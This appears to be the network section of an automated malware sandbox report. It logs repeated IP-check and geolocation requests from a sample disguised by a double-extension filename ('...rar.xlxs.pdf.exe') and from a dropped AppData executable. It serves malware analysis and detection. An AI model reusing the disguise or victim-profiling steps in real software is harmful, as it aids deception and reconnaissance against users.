Oct 3, 2024 09:16:37.599014044 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49726	132.226.8.169	80	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:38.216753006 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:40.578283072 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:40 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49731	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:43.636306047 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 3, 2024 09:16:44.963219881 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49733	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:45.695868969 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:48.158533096 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:47 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49736	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:48.999166012 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:49.864075899 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:49 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49739	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:50.555437088 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:51.574934006 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:51 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49741	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:52.232251883 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:54.093714952 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:53 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49744	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:54.761554956 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:55.603022099 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:55 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49746	132.226.8.169	80	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:16:56.207454920 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2024 09:16:59.044066906 CEST	682	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 03 Oct 2024 07:16:58 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49706	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:28 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63582 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMZ6EG1qyvEiOMN%2BDpEOYN0qyydnyLGeX2dIjD2GAE7CC%2Ble5EKjXhrW5%2FKXkuAUNR50oAebdDDFNJ1lXgt0AL9hVIjDAXtQ0%2BzfWWYPFKAxa%2B96v2jTzAbN%2Fu5pu6D6XUi5AS89"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb259be8f14267-EWR
2024-10-03 07:16:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:28 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:29 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63582 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghpBT6cs2lveVAVYlxQ6zkmk5RZusbBWRY56gUH50cdP58biXjF0XRxan1Uulk%2BaeEDfRMlxUOUz9qZ99DqtX7Bb5UrhfJrqywZw9tCIpfjDgaGvUhj%2FN3%2FpMPVOTUh7yfLjM%2Fcg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25a0fc1e4361-EWR
2024-10-03 07:16:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49710	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:30 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63584 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZgVOJ5Q7whO9izFeNYqbNhZUbIfmjM%2FCuP5DC8nwVeJUnBfu1gOe%2F2%2B58acsBtDH1g%2BVInD%2FUqu41YSlCGBHYdFQo7bvFKcjUiVRD8zC6RIoeEsnGzafpsfo6Iim3DBRBXqfrbc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25a9d96b18d0-EWR alt-svc: h3=":443"; ma=86400
2024-10-03 07:16:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:31 UTC	672	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63585 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DEPeXZRcUxY8JjIPXgMdkd9RD3Zv1XApcpvV9Ha6HQHspUGr6wjVG11YFb6JARzRlZ6t6az9miTQM8lYo7M7vb9w4xqY8YdOiNFfBlkqkGZUX8rln29yCz5M6Ja46%2BW2iTWFskkM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25b13bcf421f-EWR
2024-10-03 07:16:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:32 UTC	688	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63586 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XB6b7YqGsf%2B%2BAtqcwbltiXT6lDlbkVtNmrybBBZMpEqkvVIr9Fq3cbQKD9Usn23mCuGgPg8i%2Bn%2BRHy9W%2B4CWKqtw%2BeRSAyXAx%2BEl%2BxK3oIP%2BINiyzlLROKvtPBnCfIpOzjb5Tymx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25b81e917ca6-EWR
2024-10-03 07:16:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49716	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:33 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:34 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63587 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMRkeVRvA2FXUPXq%2Bv3dnYFZUhUcEycvYQ24eV47yK2uKycX7KAaj9%2BQ%2Bb7cp9lZEA%2FRBQxvGeD4Un9XU6RV4mAmUUhCmaznWmjZCtuCvQn099O%2BzCP%2FsSNHpUkXsQQuchxCxtuj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25c03cce4345-EWR
2024-10-03 07:16:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

